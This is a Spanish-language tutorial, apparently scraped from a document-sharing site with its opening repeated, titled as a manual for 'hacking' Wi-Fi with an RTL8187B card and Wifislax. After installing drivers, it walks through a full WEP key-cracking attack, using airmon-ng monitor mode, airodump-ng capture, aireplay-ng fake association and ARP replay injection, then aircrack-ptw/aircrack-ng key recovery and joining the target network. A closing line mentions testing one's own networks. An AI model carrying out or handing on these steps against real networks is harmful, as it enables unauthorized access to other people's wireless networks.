9
MANUAL HACKIN WIFI CON RTL8187B Y WIFISLAX Una vez cargado este sistema operativo Linux, empecé a intentar usar las herramientas para ver que podía hacer. Sin éxito. No detectaba la placa inalámbrica. Me di cuenta que el chip de la placa era un RT8187B y el Wifislax no trae los drivers para esta placa (lo verifiqué utilizando el Everest (http://www.lavalys.com/products.php? ps=UE&lang=en&page=9). Reinicie la PC, cargue Windows y me puse a investigar arduamente en foros, a ver que conseguía. No tuve mucho éxito, todos los foros decían que esa placa no iba a andar, que era una basura. No había ninguna explicación. Al menos conseguí los drivers de la placa para Linux y decidí que tenía que intentar todo antes de rendirme, aparte quería investigar y me dio mucha bronca que mi placa no fuera compatible (al menos eso dice en los foros). Aquí les dejo los drivers: http://www.mediafire.com/? sharekey=09919b3f76847bd675a4fc82078ae6c8e04e75f6e8ebb871 Los pedi directamente a uno de los encargados de software de realtek (lo contacte por mail con mi spanglish, jojo) Copie los drivers en una particion de mi disco C:/ (gracias a dios Wifislax monta automáticamente todas las unidades que detecta al inicio, aunque sean NTFS),

Hackin Wifi Con Wifislax Con RTL8187B

Embed Size (px)

DESCRIPTION

Hacking Wifi con rtl8187B y Wifislax

Citation preview

Page 1: Hackin Wifi Con Wifislax Con RTL8187B

MANUAL HACKIN WIFI CON RTL8187B Y WIFISLAX

Una vez cargado este sistema operativo Linux, empecé a intentar usar las herramientas para ver que podía hacer. Sin éxito. No detectaba la placa inalámbrica. Me di cuenta que el chip de la placa era un RT8187B y el Wifislax no trae los drivers para esta placa (lo verifiqué utilizando el Everest (http://www.lavalys.com/products.php?ps=UE&lang=en&page=9).Reinicie la PC, cargue Windows y me puse a investigar arduamente en foros, a ver que conseguía. No tuve mucho éxito, todos los foros decían que esa placa no iba a andar, que era una basura. No había ninguna explicación. Al menos conseguí los drivers de la placa para Linux y decidí que tenía que intentar todo antes de rendirme, aparte quería investigar y me dio mucha bronca que mi placa no fuera compatible (al menos eso dice en los foros). Aquí les dejo los drivers:http://www.mediafire.com/?sharekey=09919b3f76847bd675a4fc82078ae6c8e04e75f6e8ebb871Los pedi directamente a uno de los encargados de software de realtek (lo contacte por mail con mi spanglish, jojo)

Copie los drivers en una particion de mi disco C:/ (gracias a dios Wifislax monta automáticamente todas las unidades que detecta al inicio, aunque sean NTFS),

Mediante Windows busque la MAC ADD de la placa (la obtuve mediante la consola de DOS, colocas ipconfig -all y la anotamos, nos tiene que dar un numero tipo 11:22:3T:44:F5:66, pueden ser letras y números) o sino directamente de las propiedades de la conexion inalambrica

Page 2: Hackin Wifi Con Wifislax Con RTL8187B

Reinicie la pc, volví a colocar el LiveCD, inicie nuevamente Wifislax y copie los drivers del disco duro (/mnt/sda1) al directorio ROOT.

Abri una nueva consola y escribí:(usualmente las consolas están iniciadas en la carpeta root, en donde hemos guardado nuestro archivo)

tar -xvf rtl8187B_linux_26.1052.0225.2009.release.tar.gz (el ultimo es el nombre del archivo, si no lo cambiaron lo dejan así tal cual)

Page 3: Hackin Wifi Con Wifislax Con RTL8187B

cd rtl8187B_linux_26.1052.0225.2009.release (con esto ingresamos al directorio donde están los drivers)

make (con este comando instalamos los drivers)

Page 4: Hackin Wifi Con Wifislax Con RTL8187B

./wlan0up (y ahora "levantamos" nuestra placa)

iwconfig (verificamos que ya esta la placa y que todos los parámetros normales)

abrimos una nueva consola

airodump-ng wlan0 (con este comando vemos las redes que estan a nuestro alcance, con su respectiva mac (bssid), canal (ch) y nombre (essid)

Page 5: Hackin Wifi Con Wifislax Con RTL8187B

airmon-ng start wlan0 6 (de esta manera colocamos nuestra placa en modo monitor, para poder monitorear las redes del canal 6 (#CH) Nos tiene que aparecer un mensaje diciendo que ahí esta en modo monitor

cerramos la consola y abrimos una nuevaairodump-ng –w /mnt/sda1/pass –c 6 wlan0  (de esta forma empezamos a monitorear las redes del canal 6 y guardamos los resultados en la carpeta mnt que es donde se montan las unidades. Yo la guardare en sda1 que es la unidad C: de Windows con el nombre de pass)

Si existe alguna estación asociada al router podemos saltarnos este paso y en el siguiente donde hay que poner la MACNUESTRA ponemos la del cliente actual.abrimos una nueva consola y ponemos:aireplay-ng -1 30 –e NombreESSID –a MACROUTER –h MACNUESTRA wlan0  (con este comando creamos una asociación entre el router y la pc. Debemos intentar una y otra vez hasta que nos aparezca “association sucefull :-)”

Page 6: Hackin Wifi Con Wifislax Con RTL8187B

si todo va bien, deberíamos ver algo así

abrimos otra consola y colocamosaireplay-ng -3 –x600 –b MACROUTER –h MACNUESTRA wlan0 (con esto comenzamos a leer y enviar paquetes y recibir ARP y guardarlos)

una vez que tenemos una gran cantidad de IV´s (#DATA) (en la pantalla que dejamos funcionando en el paso anterior) (a una gran cantidad me refiero a arriba de 60.000 para claves WEP de 64 bits, o sea 5 caracteres ASCII, o arriba de 150.000 para contraseñas WEP de 128 bits o sea 13 caracteres ASCII)

Page 7: Hackin Wifi Con Wifislax Con RTL8187B

abrimos una nueva consola y utilizaremos el siguiente comando

aircrack-ptw /mnt/sda1/pass-01.cap  (aquí es donde habíamos generado el archivo. Ingresamos al directorio y nos fijamos cual de los archivos es el mas grande (en tamaño kb) y lo usaremos para averiguar la clave WEP en tan solo unos segundos, en este caso el mas grande era el pass-01.cap)

Por arte de magia (y algoritmos que ningún mago puede explicar) en tan solo un segundo obtuve la clave WEP en caracteres hexadecimales y ASCII. Pero estuve “conectado” unos 15 minutos.

También pueden obtenerla mediante aircrack-ng /mnt/sda1/pass-01.cap (tarda unos segundos mas) yo lo probé con los dos y dio el mismo resultado

Page 8: Hackin Wifi Con Wifislax Con RTL8187B

y configuramos la conexión

iwconfig wlan0 mode managed essid NOMBREDESSID key CLAVEWEP

ahora obtenemos una dirección IP (esto demora unos segundos)

dhcpcd wlan0

probamos un ping al router

y podemos probar nuestra conexión con un ping a Google por ejemplo

Page 9: Hackin Wifi Con Wifislax Con RTL8187B

ping www.google.com

y ya estamos conectados!

Si no nos agrada navegar por Linux, reiniciamos la PC y cuando vamos a conectaros a la red y nos pida la clave, colocamos la que nos dio el aircrack y listoooo!

Probe introducir una clave WEP de 128 bits (o sea 13 caracteres ASCII) y en 20 minutos la obtuve, de la misma manera que la anterior. Espero les sirva para poder probar la seguridad de sus redes.En mi casa tengo puesta clave WPA2 y aun no la he podido descifrar con Wifislax, por lo que me parece lo mas seguro del momento.